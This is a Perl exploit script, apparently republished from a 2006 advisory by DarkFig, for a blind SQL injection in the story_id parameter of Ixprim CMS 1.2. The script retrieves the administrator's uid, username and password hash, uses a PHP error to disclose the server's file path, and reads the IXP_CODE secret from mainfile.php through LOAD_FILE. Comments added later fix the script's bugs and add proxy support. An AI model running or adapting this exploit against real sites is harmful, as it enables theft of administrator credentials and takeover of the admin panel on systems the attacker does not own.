Ixprim CMS 1.2 Remote Blind SQL Injection Exploit
来源:acid-root.new.fr 作者:DarkFig 发布时间:2006-12-22  

#!/usr/bin/perl
#
# INFORMATIONS
# ============
# Affected.scr..: Ixprim 1.2
# Poc.ID........: 16061221
# Type..........: Blind SQL Injection
# Risk.level....: Medium
# Conditions....: MySQL FILE privilege (LOAD_FILE) is needed only for the final IXP_CODE step; the uid/username/hash steps need no extra privilege
# Src.download..: www.ixprim-cms.org
# Poc.link......: acid-root.new.fr/poc/16061221.txt
# Credits.......: DarkFig
#
#
# SCREENSHOT
# ==========
# header> Ixprim 1.2 Remote Blind SQL Injection Exploit
# header> =============================================
# status> Searching if someone posted a comment
# sploit> story_id=2
# status> Searching the administrator's uid
# sploit> 1
# status> Searching the administrator's username length
# sploit> 4
# status> Searching the administrator's username
# sploit> root
# status> Searching the adminitrator's password hash
# sploit> 7b24afc8bc80e548d66c4e7ff72171c5
# status> Searching a full path disclosure
# sploit> /home/www/ixprim-1.2/html/mainfile.php
# status> Searching the confidential ixp code
# sploit> c998aa6188034690aab6565c0099fe0a
#
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Response;
use Getopt::Long;

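print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit";
print STDOUT "\n header> =============================================\n";

# Command-line options. The script predates `use strict`; these are package
# globals that the rest of the file (including sendreq()) reads directly.
#   -host   target host, with or without a scheme
#   -path   web root of the Ixprim install, default "/"
#   -proxh  optional HTTP proxy, -proxu/-proxp its Basic-auth credentials
my $opt = GetOptions(
    'host=s'  => \$host,
    'path=s'  => \$path,
    'proxh=s' => \$proxh,
    'proxu=s' => \$proxu,
    'proxp=s' => \$proxp);

# Bail out on an unknown option as well as on a missing host; GetOptions
# only warns on bad input and would otherwise let the run continue.
if (!$opt or !$host) {
    print STDOUT " header> Usage..: xpl.pl -host [host] -path [path]\n";
    print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n";
    exit(1);
}

# Normalise the target pieces so that $host.$path.'file.php' is always a
# well-formed URL: keep an existing http:// or https:// scheme instead of
# prefixing "http://" to it (the original turned "https://x" into
# "http://https://x"), and force $path to start and end with "/" so a value
# such as "/ixprim" does not become "/ixprimixm_ixpnews.php".
$host = "http://$host" unless $host =~ m{^https?://}i;
$path = (defined($path) && length($path)) ? $path : "/";
$path = "/$path" unless $path =~ m{^/};
$path .= "/"     unless $path =~ m{/$};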

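# HTTP client shared by every request in the script (sendreq() uses the
# same $ua). Proxy support is optional.
my $ua = LWP::UserAgent->new();
$ua->agent('r00xzilla');
$ua->timeout(30);
# LWP::UserAgent->proxy() takes a scheme name or an array ref of scheme
# names. The original passed the literal string '[http]', which matches no
# scheme, so -proxh was silently ignored and every request went out directly
# from the operator's own address.
$ua->proxy(['http'] => $proxh) if $proxh;
# Put the proxy credentials on the agent's default headers so that all
# requests carry them, not only the first one that is built by hand below.
$ua->default_headers->proxy_authorization_basic($proxu, $proxp) if $proxu;

# find_story_id(HTML) - return the id of the first news story whose link to
# its comments appears in the news index, or undef when none is found.
# Both URL forms are handled: "story_id=N" and the rewritten "news-artN.html".
# The original pattern used "||" inside each group, i.e. an alternation with
# an empty branch, which made every prefix optional and let the pattern fire
# on any 'N">M ' fragment; this one requires the real prefix.
sub find_story_id {
    my ($html) = @_;
    return unless defined $html;
    if ($html =~ m{(?:story_id=|news-art)([0-9]+)(?:\.html)?">([0-9]+) (?:commentaire|comment)}) {
        return $1;
    }
    return;
}

my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php');
$req->proxy_authorization_basic($proxu,$proxp) if $proxu;
my $index = $ua->request($req);
print STDOUT " status> Searching if someone posted a comment\n";
if (!$index->is_success) {
    # A connection or HTTP failure is not "no comment posted"; say what
    # happened so the operator does not chase the wrong problem.
    print STDOUT " status> Request failed: ".$index->status_line."\n\n";
    exit(1);
}
$res = $index->content;

# There is more than one SQL injection, but this one is the most
# interesting to exploit: the parameter 'story_id' isn't properly
# sanitised before being used in an SQL query. URL rewriting is supported.
$story_id = find_story_id($res);
if (defined $story_id) {
    # Base URL that every blind query is appended to (read by sendreq()).
    $bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id";
    print STDOUT " sploit> story_id=$story_id\n";
} else {
    print STDOUT " status> No comment posted\n\n";
    exit(1);
}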

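# Step 1: the lowest uid in ixp_users is taken to be the administrator (the
# first account the installer creates). Only one digit is read, so a uid
# of 10 or more would be truncated - kept as in the original to avoid the
# extra 10 requests (2 s each) a second position would cost.
# sendreq() returns the characters it recovered; an empty or non-numeric
# result means the injection point is not answering, and every later query
# (which interpolates $uid) would be malformed.
print STDOUT " status> Searching the administrator's uid\n";
$uid = sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20limit%200,1");
if ($uid !~ /^[0-9]+$/) {
    print STDOUT " status> Could not read a uid, the injection point does not answer as expected\n\n";
    exit(1);
}

# Step 2: the username length bounds the per-character loop of step 3.
print STDOUT " status> Searching the administrator's username length\n";
$admlg = sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$uid))");
if ($admlg !~ /^[0-9]+$/ or $admlg == 0) {
    print STDOUT " status> Could not read the username length\n\n";
    exit(1);
}

# Steps 3 and 4: the username and the 32-hex-character password hash.
# sendreq() prints every recovered character on STDERR as it goes, so the
# return values are not needed here.
print STDOUT " status> Searching the administrator's username\n";
sendreq(1,$admlg,"select%20uname%20from%20ixp_users%20where%20uid=$uid");

print STDOUT " status> Searching the adminitrator's password hash\n";
sendreq(1,32,"select%20pass%20from%20ixp_users%20where%20uid=$uid");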

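# Full path disclosure: requesting the FCKeditor glue file on its own makes
# PHP print an error that names the script's absolute path
# ("... in <b>/abs/path/kernel/plugins/fckeditor2/ixprim_api.php</b> ...").
# Everything before "kernel" is the web root, where mainfile.php (the file
# holding IXP_CODE) lives.
print STDOUT " status> Searching a full path disclosure";
$req = HTTP::Request->new(GET => $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php');
my $fpd_resp = $ua->request($req);
$res = $fpd_resp->content;
# Accept either path separator after "kernel". The original "(\/||\\)" had
# an empty alternative and so did not require a separator at all. PHP error
# pages are often served with a 200, so the status is only reported when the
# pattern is not found.
if ($res =~ m{in <b>(.*?)kernel[/\\]}) {
    $fpd = $1.'mainfile.php';
    print STDOUT "\n sploit> $fpd\n";
} else {
    print STDOUT "\n status> Can't get the full path disclosure";
    print STDOUT " (HTTP ".$fpd_resp->status_line.")" unless $fpd_resp->is_success;
    print STDOUT "\n";
    exit(1);
}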

# A personal code that is stored in mainfile.php protects the administration panel
#
# // Code personnel CMS
# define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a');
#
# This code is generated by the function code() stored in install.fct.php
#
# function code($param='1')
# {
# $number = rand(1,1024);
# $temp = md5(($number*time()).$param);
# $temp = substr($temp, 0, 8);
# return $temp;
# }
#
# $param = $host.$path, and $temp can be modified by the user.
# After the request is sent, the script creates the SQL tables, and the time()
# at which it created them is stored in the MySQL database. We can retrieve it with the
# SQL injection and, IF the user did not modify the generated code, recover the personal code.
# The time() used when creating the tables and the one used when generating the code
# are not the same, but it could be bruteforced with some parameters.
# Since the user can change the generated code, though, this script instead reads it
# back with the SQL injection using load_file() and REGEXP (which needs the FILE privilege).
#
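print STDOUT " status> Searching the confidential ixp code\n";

# Example with "C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php"
#
# magic_quotes_gpc=off
# ====================
# [SQL] and LOAD_FILE("C:/Program Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php")
# REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]");
#
# magic_quotes_gpc=on
# ===================
# [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char(103),char(114),
# char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char(47),char(69),
# char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56),char(47),char(119),
# char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),char(109),char(45),
# char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char(47),char(109),char(97),
# char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),char(104),char(112)))
# REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),char(69),char(34),char(44),
# char(32),char(39),char([PART_OF_IXP_CODE])))
#
# Both the path and the REGEXP prefix go through concatchar() so the query
# contains no quote characters and works whether magic_quotes_gpc is on or
# off. sendreq() appends the characters recovered so far to the REGEXP, one
# more per round. This step is the only one that needs the MySQL FILE
# privilege on the injected account: without it LOAD_FILE() yields NULL, the
# condition is never true and nothing comes back.
$ixpcode = sendreq(1,32,"load_file(concat(".concatchar($fpd).")) REGEXP(concat(".concatchar("IXP_CODE\", '"));
if ($ixpcode eq '') {
    print STDOUT " status> No ixp code recovered (LOAD_FILE() needs the FILE privilege, or the path is wrong)\n\n";
    exit(1);
}
# The original ended with exit(1) even after a successful run; exit 0 lets a
# caller tell a completed run apart from the early failures above.
exit(0);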

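# sendreq(START, LIMIT, SQL) - recover the value of SQL one character at a
# time through the boolean-based blind injection in story_id.
#
# For every position START..LIMIT each character of a charset chosen from
# the shape of SQL is tried; the page counts as "true" when the comments
# block is rendered ('<br /> <div id="comments">'). Two query shapes exist:
#   - normal:    <base> and substr((SQL),POS,1)=char(N)
#   - load_file: <base> and SQL,char(...recovered prefix + candidate...))
#     where SQL already holds "load_file(concat(...)) REGEXP(concat(" and
#     the REGEXP grows by one character per round.
# Returns the recovered characters, possibly the empty string. Uses the
# file-level $bsql (base URL) and $ua (HTTP client).
#
# Notes kept from the original author:
#   - the username charset is [a-z0-9]; widen it if the name has other chars.
#   - sleep(2) between requests is needed to get past the anti-flood check.
#   - "if the username's length > 19 the exploit doesn't work" - the reason
#     is not visible here (possibly the early exit below); kept as documented.
sub sendreq {
    my ($start, $limit, $sql) = @_;
    my $found = '';

    # Charset by query type: digits for uid/length, [a-z0-9] for the
    # username, hex digits for the md5 hash and for the IXP_CODE lookup.
    my @charset;
    @charset = (0..9)           if $sql =~ /^(length|select%20uid)/;
    @charset = ('a'..'z', 0..9) if $sql =~ /^select%20uname/;
    @charset = ('a'..'f', 0..9) if $sql =~ /^(select%20pass|load_file)/;

    for my $pos ($start .. $limit) {
        for my $c (@charset) {
            print STDERR "\r sploit> $found$c";
            my $url = ($sql !~ /load_file/)
                ? $bsql."%20and%20substr((".$sql."),$pos,1)=".concatchar($c)
                : $bsql."%20and%20".$sql.",".concatchar($found.$c)."))";
            sleep(2);    # anti-flood protection on the target

            my $resp = $ua->get($url);
            if (!$resp->is_success) {
                # A transport/HTTP error is not a "false" answer; report it
                # rather than letting it silently corrupt the recovered string.
                print STDERR "\n status> HTTP ".$resp->status_line." at position $pos, char '$c'\n";
                next;
            }
            if ($resp->content =~ /<br \/> <div id="comments">/) {
                $found .= $c;
                last;
            }
        }

        # Early exit from the original for the length query: once the digits
        # end in a '9' with at least two digits, the number is assumed
        # complete and the remaining positions are skipped.
        last if $sql =~ /length/ and $found =~ /^[0-9]+9$/;
    }

    print STDERR "\n";
    return $found;
}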

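# concatchar(STRING) - render STRING as a comma-separated list of MySQL
# char(N) calls, e.g. "ab" -> "char(97),char(98)", so that it can be wrapped
# in concat(...) and sent without any quote characters (survives
# magic_quotes_gpc=on). Returns the empty string for an empty/undef input.
#
# The original declared this as `sub concatchar()`: an empty prototype
# rejects arguments at every call site compiled after the definition, so it
# only worked because all callers appear earlier in the file.
sub concatchar {
    my ($string) = @_;
    return '' unless defined $string && length $string;
    return join ',', map { 'char(' . ord($_) . ')' } split //, $string;
}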




 